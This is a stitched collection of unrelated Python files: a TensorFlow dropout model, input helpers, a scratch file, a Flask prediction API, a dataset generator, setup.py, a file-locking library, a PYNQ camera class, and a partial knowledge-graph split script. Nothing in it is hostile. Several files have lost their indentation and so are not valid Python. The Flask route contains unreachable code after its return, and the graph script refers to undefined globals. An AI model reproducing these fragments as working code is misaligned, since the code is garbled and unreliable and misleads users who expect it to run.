from .vannilla import SimpleModel
import tensorflow as tf
import numpy as np
import os.path as osp
import random
class DropOutModel(SimpleModel):
def __init__(self, *args, **kwargs):
SimpleModel.__init__(self, *args, **kwargs)
self.keep_prob = kwargs.get('keep_prob')
self.n_bayes_samples = kwargs.get('n_bayes_samples', 1)
def _feature_extraction_model(self, input_data, drop_out_prob=None, name='feature_model',
reuse=False):
if not drop_out_prob:
drop_out_prob = tf.constant(self.keep_prob, dtype=tf.float32)
layer = input_data
with tf.variable_scope(name):
for i, layer_dim in enumerate(self.feat_ext_dim_list[1:]):
layer = tf.layers.dense(layer, layer_dim, activation=tf.nn.relu,
reuse=reuse, name='feat_fc'+str(i))
layer = tf.nn.dropout(layer, drop_out_prob)
return layer
def _comparison_model(self, input_data, drop_out_prob=None, name='compare_model', reuse=False):
if not drop_out_prob:
drop_out_prob = tf.constant(self.keep_prob, dtype=tf.float32)
layer = input_data
w_list, b_list = [], []
with tf.variable_scope(name):
for i, layer_dim in enumerate(self.compare_nn_dim_list[1:-1]):
layer, w, b = self._sym_fc_layer(layer, layer_dim, activation_fn='Relu',
reuse=reuse, scope=name+str(i))
layer = tf.nn.dropout(layer, drop_out_prob)
w_list.append(w)
b_list.append(b)
logits, w, b = self._sym_fc_layer(layer, 2, reuse=reuse, scope='fc_out')
w_list.append(w)
b_list.append(b)
return logits, w_list, b_list
def query(self, input1, input2):
nn_input1 = np.array(input1)
nn_input2 = np.array(input2)
if nn_input1.ndim == 1:
nn_input1 = nn_input1[None, :]
if nn_input2.ndim == 1:
nn_input2 = nn_input2[None, :]
feed_dict = {
self.input1: nn_input1,
self.input2: nn_input2,
}
avg_prediction = dict()
for kwrd in self.spec_kwrd_list:
avg_prediction[kwrd] = 0
for _ in range(self.n_bayes_samples):
prediction_dict = self.sess.run(self.out_predictions, feed_dict=feed_dict)
for kwrd in self.spec_kwrd_list:
avg_prediction[kwrd] += prediction_dict[kwrd]/self.n_bayes_samples
self.logger.log_text('{}'.format(avg_prediction), stream_to_stdout=False,
fpath=osp.join(self.logger.log_path, 'avg_prediction.txt'))
return avg_prediction
def evaluate(self):
"""
A function that evaluates the nn with oracle data to see how they compare
"""
        assert self.evaluate_flag, 'To evaluate, the evaluate flag must be set to True'
oracle_feed_dict = {
self.input1: self.oracle_input1,
self.input2: self.oracle_input2,
}
for kwrd, tensor in self.true_labels.items():
oracle_feed_dict[tensor] = self.labels[kwrd]
avg_accuracy, avg_predictions = {}, {}
for kwrd in self.spec_kwrd_list:
avg_accuracy[kwrd] = 0
avg_predictions[kwrd] = 0
for _ in range(self.n_bayes_samples):
accuracy, predictions = self.sess.run([self.accuracy, self.out_predictions],
feed_dict=oracle_feed_dict)
for kwrd in self.spec_kwrd_list:
avg_predictions[kwrd] += predictions[kwrd]/self.n_bayes_samples
avg_accuracy[kwrd] += accuracy[kwrd]/self.n_bayes_samples
# see if nn says input1 is better than input2 for all rows according to the critical specs
nn_is_1_better = []
for i in range(len(self.df)):
is_1_better = all([random.random() > avg_predictions[kwrd][i][0]
for kwrd in self.df['critical_specs'][i]])
nn_is_1_better.append(is_1_better)
# compute all accuracy numbers (oracle_nn): false_false, true_true, false_true, true_false
ff, tt = 0, 0
ft, tf = 0, 0
for nn_vote, oracle_vote in zip(nn_is_1_better, self.oracle_is_1_better):
if not nn_vote and not oracle_vote:
ff+=1
elif nn_vote and oracle_vote:
tt+=1
elif not nn_vote and oracle_vote:
tf+=1
elif nn_vote and not oracle_vote:
ft+=1
total_accuracy = (tt+ff)/(tt+ff+tf+ft)
        # how many of those that the oracle says are good the nn also says are good:
        # very important, should be 1
        a1 = tt/(tf+tt)
        # how many of those that the nn says are good are actually good: very important,
        # should be 1; indicates that the nn doesn't add useless data
        a2 = tt/(ft+tt)
        # how many of those that the oracle says are bad the nn also says are bad:
        # should be 1; indicates that the nn can prune out the space efficiently
        a3 = ff/(ff+ft)
        # how many of those that the nn says are bad are actually bad: should be 1
        a4 = ff/(tf+ff)
avg_accuracy["total_acc"] = total_accuracy
avg_accuracy["a1"] = a1
avg_accuracy["a2"] = a2
avg_accuracy["a3"] = a3
avg_accuracy["a4"] = a4
avg_accuracy["tt"] = tt
avg_accuracy["ff"] = ff
avg_accuracy["tf"] = tf
avg_accuracy["ft"] = ft
self.df_accuracy = self.df_accuracy.append(avg_accuracy, ignore_index=True)
self.logger.store_db(self.df_accuracy, fpath=osp.join(self.eval_save_to,
self.file_base_name + '.pkl'))
self.logger.log_text(avg_accuracy, stream_to_stdout=False, fpath=self.acc_txt_file)
|
def leiaint(msg):
    while True:
        try:
            i = int(input(msg))
        except KeyboardInterrupt:
            print('Data entry interrupted by the user.')
            break
        except (ValueError, TypeError):
            print('\033[0;31m ERROR! Please type a valid number \033[m')
            continue
        else:
            return i
def leiafloat(msg):
    while True:
        try:
            f = float(input(msg))
        except KeyboardInterrupt:
            print('Data entry interrupted by the user.')
            break
        except (ValueError, TypeError):
            print('\033[0;31m ERROR! Please type a valid number \033[m')
            continue
        else:
            return f
i = leiaint('Type an integer: ')
f = leiafloat('Type a real number: ')
print(f'The values you typed were {i} and {f}')
|
import os
import pickle
from sys import platform
import time
import timeit
import itertools
import file_object
import mimeDict
from test_import import *
# aList = [1,2,3]
# bList = [4,5,6]
# a, b = tuple(aList), tuple(bList)
# print(type(b))
# print(a)
# print(b)
# print(os.path.isdir('/Users/jd/Documents/Sharpening Business/customer records.numbers'))
# path = '/Users/jd/Documents/Sharpening Business/hey/scam.pdf'
# fileExt = path[path.rfind('.'):]
# print(mimeDict.mimeDict[fileExt])
# pathList = ['a', 'a', 'b', 'c', 'b']
# path = pathList.pop(pathList.index('b'))
# print(path)
# print(pathList)
# a = [1,2,3]
# b = ['a','b','c','d','e']
# for i, j in itertools.zip_longest(a, b):
# if i != None:
# print(i, j)
# xy = [1,2,3]
# for x in []:
# print('hi')
# aSet = {1,2,3}
# bSet = {3,2}
# print(aSet.difference(bSet))
# myList = [1,2,3,4,5]
# for x in myList:
# print(x)
# if x == 3:
# myList.append(6)
# pathName = '/Users/jd/Desktop/Google-Drive-Sync/testing/recursive test/yo/class notes'
# # pathIndex = pathName.rfind('/')
# print(pathName[pathName.rfind('/')+1:])
# print(os.path.exists('/Users/jd/Desktop/Google-Drive-Sync/test destination'))
# slash = '\\'
# print('a'+slash+'c')
# epochTime = os.path.getmtime('/Users/jd/Desktop/Google-Drive-Sync/upload test media/test.txt')
# print(epochTime)
# # formatTime = time.strftime('%Y-%m-%d %H:%M:%S', epochTime)
# # Python Time Tuple format
# timeTuple = (2019, 5, 25, 11, 6, 30, 5, 145, -1)\
# print(time.localtime(epochTime))
# print(epochTime)
# lambda test
# g = lambda x: 3*x + 1
# num = '05'
# a = lambda x: x[0] == '0'
# print(a(num))
# print(time.time())
# Gets time offset
# print(time.altzone/3600)
# os.walk tutorial
# if platform == 'win32':
# TARGET_DIR = r'E:\School Work'
# elif platform == 'darwin':
# TARGET_DIR = '/Users/jd/Desktop/School Work'
# TARGET_DIR = '/Users/jd/Desktop/School Work'
# for i, (root, subdirs, files) in enumerate(os.walk('/Users/jd')):
# if '.cocoapods' in subdirs:
# subdirs.remove('.cocoapods')
# print('Pass', i)
# print('root:', root)
# print('subdirs:', subdirs)
# print('files:', files)
# print()
# testStr = 'application/vnd.google-apps.folder'
# newStr = testStr[-6:]
### Pickling--pickle can be overwritten with same method as creating it new
# testVar = "This is a second test"
# pickleOut = open('test.pickle', 'wb')
# pickle.dump(testVar, pickleOut)
# pickleOut.close()
# pickleIn = open('test.pickle', 'rb')
# testVar = pickle.load(pickleIn)
# pickleIn.close()
# print(testVar)
|
#This is the main application handler for Hippocrates experiment creation
#it provides functionality for its main route /experiment
#Arkangel AI
#Responsible: Nicolas Munera
from flask import Flask, jsonify, request, send_from_directory
from flask_cors import CORS,cross_origin
from six.moves import http_client
from api_functions import *
import os
import logging
app_IP = '0.0.0.0'
app= Flask(__name__)
CORS(app, support_credentials=True)
#0. Disable flask pretify for json optimization
app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False
app.config['JSON_SORT_KEYS'] = False
app.config['UPLOAD_FOLDER'] = os.getcwd()
print(os.getcwd())
@app.route('/leukemia_predict', methods=['POST'])
def leukemia_predict():
"""Simple echo service."""
json_data = request.get_json()
res_dict = api_predict(json_data)
return jsonify(res_dict)
try:
json_data = request.get_json()
res_dict = api_predict(json_data)
except Exception as e:
print('error: ', e)
return jsonify( { 'error':str(e), 'status':'error'} )
return jsonify(res_dict)
@app.route("/uploads/<path:name>")
def download_file(name):
return send_from_directory(
app.config['UPLOAD_FOLDER'], name, as_attachment=True
)
@app.route("/health_check", methods=['GET'])
def health_check():
return jsonify( {'respuesta': 'estoy vivo'} )
@app.route('/auth/info/googlejwt', methods=['GET'])
def auth_info_google_jwt():
"""Auth info with Google signed JWT."""
return auth_info()
@app.route('/auth/info/googleidtoken', methods=['GET'])
def auth_info_google_id_token():
"""Auth info with Google ID token."""
return auth_info()
@app.route('/auth/info/firebase', methods=['GET'])
@cross_origin(send_wildcard=True)
def auth_info_firebase():
"""Auth info with Firebase auth."""
return auth_info()
@app.errorhandler(http_client.INTERNAL_SERVER_ERROR)
def unexpected_error(e):
"""Handle exceptions by returning swagger-compliant json."""
logging.exception('An error occured while processing the request.')
response = jsonify({
'code': http_client.INTERNAL_SERVER_ERROR,
'message': 'Exception: {}'.format(e)})
response.status_code = http_client.INTERNAL_SERVER_ERROR
return response
if __name__ == '__main__':
app.run(host=app_IP, port=1056)
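# Hedged client sketch (assumes the service above is running locally on port 1056):
#
#     import requests
#     print(requests.get('http://localhost:1056/health_check').json())
#     # -> {'respuesta': 'estoy vivo'}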
|
import argparse
import numpy as np
import scipy.io as sio
from pathlib import Path
from tqdm import tqdm
from PIL import Image
def main():
parser = create_argument_parser()
args = parser.parse_args()
generate_ccp_dataset(args)
def create_argument_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', type=str, default='datasets/clothing-co-parsing')
parser.add_argument('--save_root', type=str, default='datasets/jeans2skirt_ccp')
parser.add_argument('--cat1', type=str, default='jeans', help='category 1')
parser.add_argument('--cat2', type=str, default='skirt', help='category 2')
return parser
def generate_ccp_dataset(args):
"""Generate COCO dataset (train/val, A/B)"""
args.data_root = Path(args.data_root)
args.img_root = args.data_root / 'photos'
args.pix_ann_root = args.data_root / 'annotations' / 'pixel-level'
args.img_ann_root = args.data_root / 'annotations' / 'image-level'
args.pix_ann_ids = get_ann_ids(args.pix_ann_root)
args.img_ann_ids = get_ann_ids(args.img_ann_root)
args.label_list = sio.loadmat(str(args.data_root / 'label_list.mat'))['label_list'].squeeze()
args.save_root = Path(args.save_root)
args.save_root.mkdir()
generate_ccp_dataset_train(args, 'A', args.cat1)
generate_ccp_dataset_train(args, 'B', args.cat2)
generate_ccp_dataset_val(args, 'A', args.cat1)
generate_ccp_dataset_val(args, 'B', args.cat2)
def generate_ccp_dataset_train(args, imset, cat):
img_path = args.save_root / 'train{}'.format(imset)
seg_path = args.save_root / 'train{}_seg'.format(imset)
img_path.mkdir()
seg_path.mkdir()
cat_id = get_cat_id(args.label_list, cat)
pb = tqdm(total=len(args.pix_ann_ids))
pb.set_description('train{}'.format(imset))
for ann_id in args.pix_ann_ids:
ann = sio.loadmat(str(args.pix_ann_root / '{}.mat'.format(ann_id)))['groundtruth']
if np.isin(ann, cat_id).sum() > 0:
img = Image.open(args.img_root / '{}.jpg'.format(ann_id))
img.save(img_path / '{}.png'.format(ann_id))
seg = (ann == cat_id).astype('uint8') # get segment of given category
seg = Image.fromarray(seg * 255)
seg.save(seg_path / '{}_0.png'.format(ann_id))
pb.update(1)
pb.close()
def generate_ccp_dataset_val(args, imset, cat):
img_path = args.save_root / 'val{}'.format(imset)
seg_path = args.save_root / 'val{}_seg'.format(imset)
img_path.mkdir()
seg_path.mkdir()
cat_id = get_cat_id(args.label_list, cat)
pb = tqdm(total=len(args.img_ann_ids))
pb.set_description('val{}'.format(imset))
for ann_id in args.img_ann_ids:
ann = sio.loadmat(str(args.img_ann_root / '{}.mat'.format(ann_id)))['tags']
if np.isin(ann, cat_id).sum() > 0:
img = Image.open(args.img_root / '{}.jpg'.format(ann_id))
img.save(img_path / '{}.png'.format(ann_id))
seg = (ann == cat_id).astype('uint8') # get segment of given category
seg = Image.fromarray(seg * 255)
seg.save(seg_path / '{}_0.png'.format(ann_id))
pb.update(1)
pb.close()
def get_ann_ids(anno_path):
ids = list()
for p in anno_path.iterdir():
ids.append(p.name.split('.')[0])
return ids
def get_cat_id(label_list, cat):
for i in range(len(label_list)):
if cat == label_list[i][0]:
return i
if __name__ == '__main__':
main()
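# Hedged CLI sketch (the script name is hypothetical; the paths and categories are the
# argparse defaults above):
#
#     python generate_ccp_dataset.py --data_root datasets/clothing-co-parsing \
#         --save_root datasets/jeans2skirt_ccp --cat1 jeans --cat2 skirt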
|
from lark import Tree
from src.interpreter.expression import Expression
import src.interpreter.globals as globals
from src.interpreter.userfunction import UserFunction
def func(name, args: Tree, body):
parsed_name = Expression(name, globals.codebase)
parsed_args = list(map(lambda x: Expression(x, globals.codebase), args.children[1:]))
UserFunction(parsed_name, parsed_args, body, True)
|
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
with open("VERSION", "r", encoding="utf-8") as ver:
version = ver.read()
setuptools.setup(
name="simple-api",
version=version,
author="Karel Jilek",
author_email="los.karlosss@gmail.com",
description="A library to build a backend API (GraphQL) from Django",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/karlosss/simple_api",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
"django==3.0.7",
"graphene==2.1.8",
"graphene-django==2.10.1",
],
python_requires='>=3.6',
)
|
import abc
import atexit
import contextlib
import os
import pathlib
import random
import tempfile
import time
import typing
import logging
from . import constants
from . import exceptions
from . import portalocker
logger = logging.getLogger(__name__)
DEFAULT_TIMEOUT = 5
DEFAULT_CHECK_INTERVAL = 0.25
DEFAULT_FAIL_WHEN_LOCKED = False
LOCK_METHOD = constants.LockFlags.EXCLUSIVE | constants.LockFlags.NON_BLOCKING
__all__ = [
'Lock',
'open_atomic',
]
Filename = typing.Union[str, pathlib.Path]
def coalesce(*args: typing.Any, test_value: typing.Any = None) -> typing.Any:
'''Simple coalescing function that returns the first value that is not
equal to the `test_value`. Or `None` if no value is valid. Usually this
means that the last given value is the default value.
Note that the `test_value` is compared using an identity check
(i.e. `value is not test_value`) so changing the `test_value` won't work
for all values.
>>> coalesce(None, 1)
1
>>> coalesce()
>>> coalesce(0, False, True)
0
>>> coalesce(0, False, True, test_value=0)
False
# This won't work because of the `is not test_value` type testing:
>>> coalesce([], dict(spam='eggs'), test_value=[])
[]
'''
for arg in args:
if arg is not test_value:
return arg
@contextlib.contextmanager
def open_atomic(filename: Filename, binary: bool = True) \
-> typing.Iterator[typing.IO]:
'''Open a file for atomic writing. Instead of locking this method allows
you to write the entire file and move it to the actual location. Note that
this makes the assumption that a rename is atomic on your platform which
is generally the case but not a guarantee.
http://docs.python.org/library/os.html#os.rename
>>> filename = 'test_file.txt'
>>> if os.path.exists(filename):
... os.remove(filename)
>>> with open_atomic(filename) as fh:
... written = fh.write(b'test')
>>> assert os.path.exists(filename)
>>> os.remove(filename)
>>> import pathlib
>>> path_filename = pathlib.Path('test_file.txt')
>>> with open_atomic(path_filename) as fh:
... written = fh.write(b'test')
>>> assert path_filename.exists()
>>> path_filename.unlink()
'''
# `pathlib.Path` cast in case `path` is a `str`
path: pathlib.Path = pathlib.Path(filename)
assert not path.exists(), '%r exists' % path
# Create the parent directory if it doesn't exist
path.parent.mkdir(parents=True, exist_ok=True)
temp_fh = tempfile.NamedTemporaryFile(
mode=binary and 'wb' or 'w',
dir=str(path.parent),
delete=False,
)
yield temp_fh
temp_fh.flush()
os.fsync(temp_fh.fileno())
temp_fh.close()
try:
os.rename(temp_fh.name, path)
finally:
try:
os.remove(temp_fh.name)
except Exception:
pass
class LockBase(abc.ABC): # pragma: no cover
#: timeout when trying to acquire a lock
timeout: float
#: check interval while waiting for `timeout`
check_interval: float
#: skip the timeout and immediately fail if the initial lock fails
fail_when_locked: bool
def __init__(self, timeout: typing.Optional[float] = None,
check_interval: typing.Optional[float] = None,
fail_when_locked: typing.Optional[bool] = None):
self.timeout = coalesce(timeout, DEFAULT_TIMEOUT)
self.check_interval = coalesce(check_interval, DEFAULT_CHECK_INTERVAL)
self.fail_when_locked = coalesce(fail_when_locked,
DEFAULT_FAIL_WHEN_LOCKED)
@abc.abstractmethod
def acquire(
self, timeout: float = None, check_interval: float = None,
fail_when_locked: bool = None):
return NotImplemented
def _timeout_generator(self, timeout: typing.Optional[float],
check_interval: typing.Optional[float]) \
-> typing.Iterator[int]:
f_timeout = coalesce(timeout, self.timeout, 0.0)
f_check_interval = coalesce(check_interval, self.check_interval, 0.0)
yield 0
i = 0
start_time = time.perf_counter()
while start_time + f_timeout > time.perf_counter():
i += 1
yield i
# Take low lock checks into account to stay within the interval
since_start_time = time.perf_counter() - start_time
time.sleep(max(0.001, (i * f_check_interval) - since_start_time))
@abc.abstractmethod
def release(self):
return NotImplemented
def __enter__(self):
return self.acquire()
def __exit__(self,
exc_type: typing.Optional[typing.Type[BaseException]],
exc_value: typing.Optional[BaseException],
traceback: typing.Any, # Should be typing.TracebackType
) -> typing.Optional[bool]:
self.release()
return None
def __delete__(self, instance):
instance.release()
class Lock(LockBase):
'''Lock manager with build-in timeout
Args:
filename: filename
mode: the open mode, 'a' or 'ab' should be used for writing
truncate: use truncate to emulate 'w' mode, None is disabled, 0 is
truncate to 0 bytes
timeout: timeout when trying to acquire a lock
check_interval: check interval while waiting
fail_when_locked: after the initial lock failed, return an error
or lock the file. This does not wait for the timeout.
**file_open_kwargs: The kwargs for the `open(...)` call
fail_when_locked is useful when multiple threads/processes can race
when creating a file. If set to true than the system will wait till
the lock was acquired and then return an AlreadyLocked exception.
Note that the file is opened first and locked later. So using 'w' as
mode will result in truncate _BEFORE_ the lock is checked.
'''
def __init__(
self,
filename: Filename,
mode: str = 'a',
timeout: float = DEFAULT_TIMEOUT,
check_interval: float = DEFAULT_CHECK_INTERVAL,
fail_when_locked: bool = DEFAULT_FAIL_WHEN_LOCKED,
flags: constants.LockFlags = LOCK_METHOD, **file_open_kwargs):
if 'w' in mode:
truncate = True
mode = mode.replace('w', 'a')
else:
truncate = False
self.fh: typing.Optional[typing.IO] = None
self.filename: str = str(filename)
self.mode: str = mode
self.truncate: bool = truncate
self.timeout: float = timeout
self.check_interval: float = check_interval
self.fail_when_locked: bool = fail_when_locked
self.flags: constants.LockFlags = flags
self.file_open_kwargs = file_open_kwargs
def acquire(
self, timeout: float = None, check_interval: float = None,
fail_when_locked: bool = None) -> typing.IO:
'''Acquire the locked filehandle'''
fail_when_locked = coalesce(fail_when_locked, self.fail_when_locked)
# If we already have a filehandle, return it
fh = self.fh
if fh:
return fh
# Get a new filehandler
fh = self._get_fh()
def try_close(): # pragma: no cover
# Silently try to close the handle if possible, ignore all issues
try:
fh.close()
except Exception:
pass
exception = None
# Try till the timeout has passed
for _ in self._timeout_generator(timeout, check_interval):
exception = None
try:
# Try to lock
fh = self._get_lock(fh)
break
except exceptions.LockException as exc:
# Python will automatically remove the variable from memory
# unless you save it in a different location
exception = exc
# We already tried to the get the lock
# If fail_when_locked is True, stop trying
if fail_when_locked:
try_close()
raise exceptions.AlreadyLocked(exception)
# Wait a bit
if exception:
try_close()
# We got a timeout... reraising
raise exceptions.LockException(exception)
# Prepare the filehandle (truncate if needed)
fh = self._prepare_fh(fh)
self.fh = fh
return fh
def release(self):
'''Releases the currently locked file handle'''
if self.fh:
portalocker.unlock(self.fh)
self.fh.close()
self.fh = None
def _get_fh(self) -> typing.IO:
'''Get a new filehandle'''
return open(self.filename, self.mode, **self.file_open_kwargs)
def _get_lock(self, fh: typing.IO) -> typing.IO:
'''
Try to lock the given filehandle
returns LockException if it fails'''
portalocker.lock(fh, self.flags)
return fh
def _prepare_fh(self, fh: typing.IO) -> typing.IO:
'''
Prepare the filehandle for usage
If truncate is a number, the file will be truncated to that amount of
bytes
'''
if self.truncate:
fh.seek(0)
fh.truncate(0)
return fh
class RLock(Lock):
'''
A reentrant lock, functions in a similar way to threading.RLock in that it
can be acquired multiple times. When the corresponding number of release()
calls are made the lock will finally release the underlying file lock.
'''
def __init__(
self, filename, mode='a', timeout=DEFAULT_TIMEOUT,
check_interval=DEFAULT_CHECK_INTERVAL, fail_when_locked=False,
flags=LOCK_METHOD):
super(RLock, self).__init__(filename, mode, timeout, check_interval,
fail_when_locked, flags)
self._acquire_count = 0
def acquire(
self, timeout: float = None, check_interval: float = None,
fail_when_locked: bool = None) -> typing.IO:
if self._acquire_count >= 1:
fh = self.fh
else:
fh = super(RLock, self).acquire(timeout, check_interval,
fail_when_locked)
self._acquire_count += 1
assert fh
return fh
def release(self):
if self._acquire_count == 0:
raise exceptions.LockException(
"Cannot release more times than acquired")
if self._acquire_count == 1:
super(RLock, self).release()
self._acquire_count -= 1
class TemporaryFileLock(Lock):
def __init__(self, filename='.lock', timeout=DEFAULT_TIMEOUT,
check_interval=DEFAULT_CHECK_INTERVAL, fail_when_locked=True,
flags=LOCK_METHOD):
Lock.__init__(self, filename=filename, mode='w', timeout=timeout,
check_interval=check_interval,
fail_when_locked=fail_when_locked, flags=flags)
atexit.register(self.release)
def release(self):
Lock.release(self)
if os.path.isfile(self.filename): # pragma: no branch
os.unlink(self.filename)
class BoundedSemaphore(LockBase):
'''
Bounded semaphore to prevent too many parallel processes from running
It's also possible to specify a timeout when acquiring the lock to wait
for a resource to become available. This is very similar to
threading.BoundedSemaphore but works across multiple processes and across
multiple operating systems.
>>> semaphore = BoundedSemaphore(2, directory='')
>>> str(semaphore.get_filenames()[0])
'bounded_semaphore.00.lock'
>>> str(sorted(semaphore.get_random_filenames())[1])
'bounded_semaphore.01.lock'
'''
lock: typing.Optional[Lock]
def __init__(
self,
maximum: int,
name: str = 'bounded_semaphore',
filename_pattern: str = '{name}.{number:02d}.lock',
directory: str = tempfile.gettempdir(),
timeout=DEFAULT_TIMEOUT,
check_interval=DEFAULT_CHECK_INTERVAL):
self.maximum = maximum
self.name = name
self.filename_pattern = filename_pattern
self.directory = directory
self.lock: typing.Optional[Lock] = None
self.timeout = timeout
self.check_interval = check_interval
def get_filenames(self) -> typing.Sequence[pathlib.Path]:
return [self.get_filename(n) for n in range(self.maximum)]
def get_random_filenames(self) -> typing.Sequence[pathlib.Path]:
filenames = list(self.get_filenames())
random.shuffle(filenames)
return filenames
def get_filename(self, number) -> pathlib.Path:
return pathlib.Path(self.directory) / self.filename_pattern.format(
name=self.name,
number=number,
)
def acquire(
self,
timeout: float = None,
check_interval: float = None,
fail_when_locked: bool = None) -> typing.Optional[Lock]:
assert not self.lock, 'Already locked'
filenames = self.get_filenames()
        for n in self._timeout_generator(timeout, check_interval):  # pragma: no branch
            logger.debug('trying lock (attempt %d) %r', n, filenames)
if self.try_lock(filenames): # pragma: no branch
return self.lock # pragma: no cover
raise exceptions.AlreadyLocked()
def try_lock(self, filenames: typing.Sequence[Filename]) -> bool:
filename: Filename
for filename in filenames:
logger.debug('trying lock for %r', filename)
self.lock = Lock(filename, fail_when_locked=True)
try:
self.lock.acquire()
logger.debug('locked %r', filename)
return True
except exceptions.AlreadyLocked:
pass
return False
def release(self): # pragma: no cover
self.lock.release()
self.lock = None
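# Hedged usage sketch, kept as a comment so importing this module stays free of side
# effects; `Lock` is a context manager whose `__enter__` returns the locked file handle
# (the file name below is hypothetical):
#
#     with Lock('example.lock', timeout=1) as fh:
#         fh.write('exclusive access\n')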
|
from math import ceil
import asyncio
import os
from PIL import Image
from pynq import Xlnk
from numpy import array
from ctypes import *
from . import Arduino
from . import MAILBOX_OFFSET
from . import MAILBOX_PY2IOP_CMD_OFFSET
ARDUINO_CAM_UART_PROGRAM = "arduino_cam_uart.bin"
WRITE = 0x2
READ = 0x3
class Arduino_CAM_UART(object):
'''
Testing mailbox/circular buffer
'''
def __init__(self, mb_info):
"""Return a new instance of an Arduino_mailboxTest object.
Parameters
----------
mb_info : dict
A dictionary storing Microblaze information, such as the
IP name and the reset name.
"""
self.microblaze = Arduino(mb_info, ARDUINO_CAM_UART_PROGRAM)
self.buf_manager = Xlnk()
def test(self):
self.microblaze.write_blocking_command(WRITE)
return self.microblaze.read_mailbox(0,1)
def test_2(self):
self.microblaze.write_blocking_command(READ)
return self.microblaze.read_mailbox(0,8)
|
import pdb
import os
import math
import random
import argparse
import numpy as np
from graph_utils import incidence_matrix, get_edge_count
from dgl_utils import _bfs_relational
from data_utils import process_files, save_to_file
def get_active_relations(adj_list):
act_rels = []
for r, adj in enumerate(adj_list):
if len(adj.tocoo().row.tolist()) > 0:
act_rels.append(r)
return act_rels
def get_avg_degree(adj_list):
adj_mat = incidence_matrix(adj_list)
degree = []
for node in range(adj_list[0].shape[0]):
degree.append(np.sum(adj_mat[node, :]))
return np.mean(degree)
def get_splits(adj_list, nodes, valid_rels=None, valid_ratio=0.1, test_ratio=0.1):
'''
    Get train/valid/test splits of the sub-graph defined by the given set of nodes. The relations in this subgraph are limited to be among the given valid_rels.
'''
# Extract the subgraph
subgraph = [adj[nodes, :][:, nodes] for adj in adj_list]
# Get the relations that are allowed to be sampled
active_rels = get_active_relations(subgraph)
common_rels = list(set(active_rels).intersection(set(valid_rels)))
print('Average degree : ', get_avg_degree(subgraph))
print('Nodes: ', len(nodes))
print('Links: ', np.sum(get_edge_count(subgraph)))
print('Active relations: ', len(common_rels))
# get all the triplets satisfying the given constraints
all_triplets = []
for r in common_rels:
# print(r, len(subgraph[r].tocoo().row))
for (i, j) in zip(subgraph[r].tocoo().row, subgraph[r].tocoo().col):
all_triplets.append([nodes[i], nodes[j], r])
all_triplets = np.array(all_triplets)
# delete the triplets which correspond to self connections
ind = np.argwhere(all_triplets[:, 0] == all_triplets[:, 1])
all_triplets = np.delete(all_triplets, ind, axis=0)
print('Links after deleting self connections : %d' % len(all_triplets))
# get the splits according to the given ratio
np.random.shuffle(all_triplets)
train_split = int(math.ceil(len(all_triplets) * (1 - valid_ratio - test_ratio)))
valid_split = int(math.ceil(len(all_triplets) * (1 - test_ratio)))
train_triplets = all_triplets[:train_split]
valid_triplets = all_triplets[train_split: valid_split]
test_triplets = all_triplets[valid_split:]
return train_triplets, valid_triplets, test_triplets, common_rels
def get_subgraph(adj_list, hops, max_nodes_per_hop):
'''
    Samples a subgraph around randomly chosen root nodes, up to `hops` hops away, with a limit on the nodes selected per hop given by max_nodes_per_hop
'''
    # collapse the list of adjacency matrices into a single matrix
    A_incidence = incidence_matrix(adj_list)
    # choose a set of random root nodes
idx = np.random.choice(range(len(A_incidence.tocoo().row)), size=params.n_roots, replace=False)
roots = set([A_incidence.tocoo().row[id] for id in idx] + [A_incidence.tocoo().col[id] for id in idx])
# get the neighbor nodes within a limit of hops
bfs_generator = _bfs_relational(A_incidence, roots, max_nodes_per_hop)
lvls = list()
for _ in range(hops):
lvls.append(next(bfs_generator))
nodes = list(roots) + list(set().union(*lvls))
return nodes
def mask_nodes(adj_list, nodes):
'''
mask a set of nodes from a given graph
'''
masked_adj_list = [adj.copy() for adj in adj_list]
for node in nodes:
for adj in masked_adj_list:
adj.data[adj.indptr[node]:adj.indptr[node + 1]] = 0
adj = adj.tocsr()
adj.data[adj.indptr[node]:adj.indptr[node + 1]] = 0
adj = adj.tocsc()
for adj in masked_adj_list:
adj.eliminate_zeros()
return masked_adj_list
def main(params):
adj_list, triplets, entity2id, relation2id, id2entity, id2relation = process_files(files)
meta_train_nodes = get_subgraph(adj_list, params.hops, params.max_nodes_per_hop) # list(range(750, 8500)) #
masked_adj_list = mask_nodes(adj_list, meta_train_nodes)
meta_test_nodes = get_subgraph(masked_adj_list, params.hops_test + 1, params.max_nodes_per_hop_test) # list(range(0, 750)) #
print('Common nodes among the two disjoint datasets (should ideally be zero): ', set(meta_train_nodes).intersection(set(meta_test_nodes)))
tmp = [adj[meta_train_nodes, :][:, meta_train_nodes] for adj in masked_adj_list]
print('Residual edges (should be zero) : ', np.sum(get_edge_count(tmp)))
print("================")
print("Train graph stats")
print("================")
train_triplets, valid_triplets, test_triplets, train_active_rels = get_splits(adj_list, meta_train_nodes, range(len(adj_list)))
print("================")
print("Meta-test graph stats")
print("================")
meta_train_triplets, meta_valid_triplets, meta_test_triplets, meta_active_rels = get_splits(adj_list, meta_test_nodes, train_active_rels)
print("================")
print('Extra rels (should be empty): ', set(meta_active_rels) - set(train_active_rels))
# TODO: ABSTRACT THIS INTO A METHOD
data_dir = os.path.join(params.main_dir, 'data/{}'.format(params.new_dataset))
if not os.path.exists(data_dir):
os.makedirs(data_dir)
save_to_file(data_dir, 'train.txt', train_triplets, id2entity, id2relation)
save_to_file(data_dir, 'valid.txt', valid_triplets, id2entity, id2relation)
save_to_file(data_dir, 'test.txt', test_triplets, id2entity, id2relation)
meta_data_dir = os.path.join(params.main_dir, 'data/{}'.format(params.new_dataset + '_meta'))
if not os.path.exists(meta_data_dir):
os.makedirs(meta_data_dir)
save_to_file(meta_data_dir, 'train.txt', meta_train_triplets, id2entity, id2relation)
save_to_file(meta_data_dir, 'valid.txt', meta_valid_triplets, id2entity, id2relation)
save_to_file(meta_data_dir, 'test.txt', meta_test_triplets, id2entity, id2relation)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Save adjacency matrices and triplets')
parser.add_argument("--dataset", "-d", type=str, default="FB15K237",
help="Dataset string")
parser.add_argument("--new_dataset", "-nd", type=str, default="fb_v3",
help="Dataset string")
